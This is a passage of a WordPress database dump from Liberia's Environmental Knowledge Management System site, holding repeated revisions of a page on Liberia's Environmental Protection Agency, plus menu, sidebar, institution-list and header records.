resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.</p><h5>Mandate</h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n		<p>Coming up</p>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:epa\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-14 12:32:15','2019-11-14 12:32:15','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(2074,1,'2019-11-14 12:32:27','2019-11-14 12:32:27','<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.</p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.</p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.</p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.</p><h5>Mandate</h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n		<p>Coming up</p>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:epa\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-14 12:32:27','2019-11-14 12:32:27','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(2075,1,'2019-11-14 12:38:32','2019-11-14 12:38:32','The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.\r\n\r\nThe EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.\r\n\r\nThe Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.\r\n\r\nThe Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.\r\n<h5>Mandate</h5>\r\nThe Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.\r\n<h2>Featured Projects</h2>\r\nComing up\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:epa\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-14 12:38:32','2019-11-14 12:38:32','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(2076,1,'2019-11-14 13:00:50','2019-11-14 13:00:50','','EPA Sidebar','','publish','closed','closed','','2076','','','2019-11-14 19:01:29','2019-11-14 19:01:29','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2076',0,'sidebar','',0),(2077,1,'2019-11-14 12:59:13','2019-11-14 12:59:13','','','','publish','closed','closed','','2077','','','2019-11-14 12:59:54','2019-11-14 12:59:54','',2076,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2077',1,'condition_group','',0),(2078,1,'2022-03-10 11:08:21','2019-11-14 13:43:31','','Liberia REDD+ Safeguards Information System','','publish','closed','closed','','safeguards-information-system','','','2022-03-10 11:08:21','2022-03-10 11:08:21','',0,'https://ekmsliberia.info/?p=2078',1,'nav_menu_item','',0),(2079,1,'2022-03-10 11:08:21','2019-11-14 13:43:31','','Water, sanitation and hygiene (WASH)','','publish','closed','closed','','water-sanitation-and-hygiene-wash','','','2022-03-10 11:08:21','2022-03-10 11:08:21','',0,'https://ekmsliberia.info/?p=2079',5,'nav_menu_item','',0),(2080,1,'2022-03-10 11:08:21','2019-11-14 13:46:57','','Liberia Forest Atlas','','publish','closed','closed','','liberia-forest-atlas','','','2022-03-10 11:08:21','2022-03-10 11:08:21','',0,'https://ekmsliberia.info/?p=2080',4,'nav_menu_item','',0),(2081,1,'2022-03-10 11:08:21','2019-11-14 13:46:57','','Liberia Open Data Portal','','publish','closed','closed','','liberia-data-portal','','','2022-03-10 11:08:21','2022-03-10 11:08:21','',0,'https://ekmsliberia.info/?p=2081',2,'nav_menu_item','',0),(2082,1,'2022-03-10 11:08:21','2019-11-14 13:48:33','','Liberia Farmers Registration Data','','publish','closed','closed','','liberia-farmers-registration-data','','','2022-03-10 11:08:21','2022-03-10 11:08:21','',0,'https://ekmsliberia.info/?p=2082',6,'nav_menu_item','',0),(2083,1,'2019-11-14 13:55:19','2019-11-14 13:55:19','','UNFCCC Official Site','','publish','closed','closed','','unfccc-official-site','','','2019-11-20 15:10:39','2019-11-20 15:10:39','',0,'https://ekmsliberia.info/?p=2083',1,'nav_menu_item','',0),(2084,1,'2019-11-14 13:55:19','2019-11-14 13:55:19','','UNCCD Official Site','','publish','closed','closed','','unccd-official-site','','','2019-11-20 15:10:39','2019-11-20 15:10:39','',0,'https://ekmsliberia.info/?p=2084',2,'nav_menu_item','',0),(2085,1,'2019-11-14 13:55:19','2019-11-14 13:55:19','','UNCBD Official Site','','publish','closed','closed','','uncbd-official-site','','','2019-11-20 15:10:39','2019-11-20 15:10:39','',0,'https://ekmsliberia.info/?p=2085',3,'nav_menu_item','',0),(2086,1,'2019-11-14 13:55:19','2019-11-14 13:55:19','','Climate Change Knowledge Portal','','publish','closed','closed','','climate-change-knowledge-portal','','','2019-11-20 15:10:39','2019-11-20 15:10:39','',0,'https://ekmsliberia.info/?p=2086',4,'nav_menu_item','',0),(2087,1,'2019-11-14 13:55:19','2019-11-14 13:55:19','','UNCCD Knowledge Hub','','publish','closed','closed','','unccd-knowledge-hub','','','2019-11-20 15:10:39','2019-11-20 15:10:39','',0,'https://ekmsliberia.info/?p=2087',5,'nav_menu_item','',0),(2088,1,'2019-11-14 14:01:34','2019-11-14 14:01:34','','External Data','','publish','closed','closed','','external-data-and-sites-links','','','2019-11-14 21:57:49','2019-11-14 21:57:49','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2088',0,'sidebar','',0),(2089,1,'2019-11-14 13:59:39','2019-11-14 13:59:39','','','','publish','closed','closed','','2089','','','2019-11-14 13:59:39','2019-11-14 13:59:39','',2088,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2089',1,'condition_group','',0),(2090,1,'2019-11-14 14:00:02','2019-11-14 14:00:02','','','','publish','closed','closed','','2090','','','2019-11-14 14:00:03','2019-11-14 14:00:03','',2088,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2090',1,'condition_group','',0),(2091,1,'2019-11-14 14:07:20','2019-11-14 14:07:20','','Useful Links','','publish','closed','closed','','external-sites','','','2019-11-14 21:57:11','2019-11-14 21:57:11','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2091',0,'sidebar','',0),(2092,1,'2019-11-14 14:07:10','2019-11-14 14:07:10','','','','publish','closed','closed','','2092','','','2019-11-14 14:07:10','2019-11-14 14:07:10','',2091,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2092',1,'condition_group','',0),(2093,1,'2019-11-14 14:07:18','2019-11-14 14:07:18','','','','publish','closed','closed','','2093','','','2019-11-14 14:07:18','2019-11-14 14:07:18','',2091,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2093',1,'condition_group','',0),(2094,1,'2019-11-14 14:17:44','2019-11-14 14:17:44','[posts_table post_type=\"document\"\ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-14 14:17:44','2019-11-14 14:17:44','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(2095,1,'2019-11-14 14:19:30','2019-11-14 14:19:30','<h2>Explore to view reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-14 14:19:30','2019-11-14 14:19:30','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(2096,1,'2019-11-14 14:20:17','2019-11-14 14:20:17','<h2>Explore to view reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-14 14:20:17','2019-11-14 14:20:17','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(2107,1,'2019-11-14 14:55:38','2019-11-14 14:55:38','<h2>Explore to view reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-14 14:55:38','2019-11-14 14:55:38','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(2108,1,'2019-11-14 14:58:14','2019-11-14 14:58:14','<h2>Institutions</h2>\n<a href=\"https://ekmsliberia.info/resource-type/international/\">International</a>\n<h4><a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\">Fauna &amp; Flora International</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/international/\">International</a>\n<h4><a href=\"https://ekmsliberia.info/institution/conservation-international/\">Conservation International</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/liberia-national-bureau-of-concessions/\">Liberia National Bureau of Concessions</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\">Liberia Land Authority</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-transport/\">Ministry of Transport</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/national-fisheries-aquaculture-authority/\">National Fisheries &amp; Aquaculture Authority</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\">Forestry Development Authority</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-14 14:58:14','2019-11-14 14:58:14','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(2109,1,'2019-11-14 15:43:34','2019-11-14 15:43:34','','epa-logo','','inherit','open','closed','','epa-logo','','','2021-08-17 18:44:34','2021-08-17 18:44:34','',1582,'https://ekmsliberia.info/wp-content/uploads/2019/11/epa-logo.png',0,'attachment','image/png',0),(2110,1,'2019-11-14 15:46:07','2019-11-14 15:46:07','<p>The Environmental Protection Agency (EPA) is the regulatory Institution of the Government of Liberia for the sustainable management of the environment and its natural resources. The Agency was established by an act of the Legislature November 26, 2002 and published into hand bill on April 30, 2003.</p><p>The EPA operates on three basic legal Instruments: The National Environmental Policy (NEP), The Environmental Management and Protection Law of Liberia and the Act Creating the Environmental Protection Agency. Of these three instruments, the National Environmental Policy ordered the creation of the Environmental Protection Agency to ensure sound environmental management and put in place measure to avoid irreparable damage to the country’s natural resources. The NEP seeks to harmonize cross cutting functions between and amongst agencies. The NEP seeks to ensure long-term economic prosperity of Liberia through sustainable social and economic development of the generation without endangering the potential of future generation. The objective of the NEP is to improve the physical environment, the quality of life and the improvement of economic and social living condition of the citizenry present and future generations. It also seeks to ensure reconciliation and coordination between economic development and growth with the sustainable management of the natural resources. A National Environmental Policy provides a broad framework for the implementation of national objectives and plans.</p><p>The Environmental Protection and Management Law (EPML) of Liberia establishes a legal framework for the sustainable development, management and protection of the environment by the Environment Protection Agency in partnership with regulatory Ministries and organizations and in a close and responsive relationship with the people of Liberia; and to provide high quality information and advice on the state of the environment and for matters connected therewith. The EMPL have several principles and objectives to include but not limited to the following: The principle of sustainable development; The pre-cautionary principle, The polluter - pays principle, The principle of inter-generational equity, The principle of public participation, The principle of international co-operation in the management of environmental resources shared by two or more states; and Other principles of natural resources and environmental management.</p><p>The Act creating the Agency provides the legal mandates and authority to manage coordinate, monitor and supervise in consultation with relevant line Ministries, Agencies and organization, and other relevant stakeholders for the protection of the environment and sustainable use of natural resources. The act details the functions of the EPA from the Policy Council to environmental inspectors. The Act also clearly explain the entire environmental impact assessment (EIA) process in its totality.</p><h5>Mandate</h5><p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n		<p>Coming up</p>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:epa\" page_length=\"false\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-14 15:46:07','2019-11-14 15:46:07','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(2127,1,'2019-11-14 16:17:36','2019-11-14 16:17:36','','MOA Official Site','','publish','closed','closed','','moa-official-site','','','2019-11-14 16:17:36','2019-11-14 16:17:36','',0,'https://ekmsliberia.info/?p=2127',1,'nav_menu_item','',0),(2128,1,'2019-11-14 16:17:36','2019-11-14 16:17:36','','MOA Publications','','publish','closed','closed','','moa-publications','','','2019-11-14 16:17:36','2019-11-14 16:17:36','',0,'https://ekmsliberia.info/?p=2128',2,'nav_menu_item','',0),(2129,1,'2019-11-14 16:20:38','2019-11-14 16:20:38','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge Management System</h2>		\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-119\"><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a href=\"#\">Media </a>\n<ul>\n	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li id=\"menu-item-128\"><a href=\"#\">Bulletin </a>\n<ul>\n	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a href=\"#\">Media</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Bulletin</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-14 16:20:38','2019-11-14 16:20:38','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2130,1,'2019-11-14 16:22:42','2019-11-14 16:22:42','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-119\"><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a href=\"#\">Media </a>\n<ul>\n	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li id=\"menu-item-128\"><a href=\"#\">Bulletin </a>\n<ul>\n	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul id=\"menu-main_menu-1\"><li><a href=\"https://ekmsliberia.info/\">Home</a></li>\n<li><a href=\"#\">Knowledge Resources</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>\n	<li><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>\n	<li><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>\n	<li><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li>\n<li><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li>\n<li><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li>\n<li><a href=\"#\">Media</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>\n	<li><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>\n	<li><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li>\n</ul>\n</li>\n<li><a href=\"#\">Bulletin</a>\n<ul>\n	<li><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>\n	<li><a href=\"https://ekmsliberia.info/events/\">Events</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n</ul>\n	</nav>','Custom Header','','inherit','closed','closed','','30-revision-v1','','','2019-11-14 16:22:42','2019-11-14 16:22:42','',30,'https://ekmsliberia.info/30-revision-v1/',0,'revision','',0),(2131,1,'2019-11-14 16:23:14','2019-11-14 16:23:14','<a href=\"https://ekmsliberia.info/\" rel=\"home\"><img width=\"293\" height=\"300\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\" alt=\"Official Website of the Environmental Knowledge Management System\" /></a>\n	<!-- #site-logo-inner -->\n<!-- #site-logo -->\n			<h2>Environmental Knowledge<br> Management System</h2>		\n			<nav id=\"site-navigation\" itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n				<ul id=\"menu-main_menu\"><li id=\"menu-item-404\"><a href=\"https://ekmsliberia.info/\">Home</a></li><li id=\"menu-item-127\"><a href=\"#\">Knowledge Resources </a>\n<ul>\n	<li id=\"menu-item-125\"><a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\">Multilateral Environmental Agreements</a></li>	<li id=\"menu-item-117\"><a href=\"https://ekmsliberia.info/related-topics/\">Explore All Topics</a></li>	<li id=\"menu-item-123\"><a href=\"https://ekmsliberia.info/institutions-resources/\">Explore Institutions</a></li>	<li id=\"menu-item-120\"><a href=\"https://ekmsliberia.info/documents-database/\">Explore All Documents</a></li></ul>\n</li><li id=\"menu-item-119\"><a href=\"https://ekmsliberia.info/discussion-forum/\">Discussion Forum</a></li><li id=\"menu-item-114\"><a href=\"https://ekmsliberia.info/about/\">About EKMS</a></li><li id=\"menu-item-118\"><a href=\"https://ekmsliberia.info/country-profile/\">Country Profile</a></li><li id=\"menu-item-129\"><a href=\"#\">Media </a>\n<ul>\n	<li id=\"menu-item-1842\"><a href=\"https://ekmsliberia.info/frequently-asked-questions/\">FAQ</a></li>	<li id=\"menu-item-115\"><a href=\"https://ekmsliberia.info/blogs-news-and-stories/\">Blogs, News and Stories</a></li>	<li id=\"menu-item-124\"><a href=\"https://ekmsliberia.info/maps/\">Maps</a></li></ul>\n</li><li id=\"menu-item-128\"><a href=\"#\">Bulletin </a>\n<ul>\n	<li id=\"menu-item-126\"><a href=\"https://ekmsliberia.info/vacancy/\">Vacancy</a></li>	<li id=\"menu-item-121\"><a href=\"https://ekmsliberia.info/events/\">Events</a></li></ul>\n</li><li id=\"menu-item-116\"><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li></ul>\n			</nav><!-- #site-navigation -->\n					<!-- #site-navigation-wrap -->\n		<a href=\"#\">\n							Menu\n									Close\n						</a>\n	<!-- #oceanwp-mobile-menu-navbar -->\n	<nav itemscope=\"itemscope\" itemtype=\"http://schema.org/SiteNavigationElement\">\n		<ul 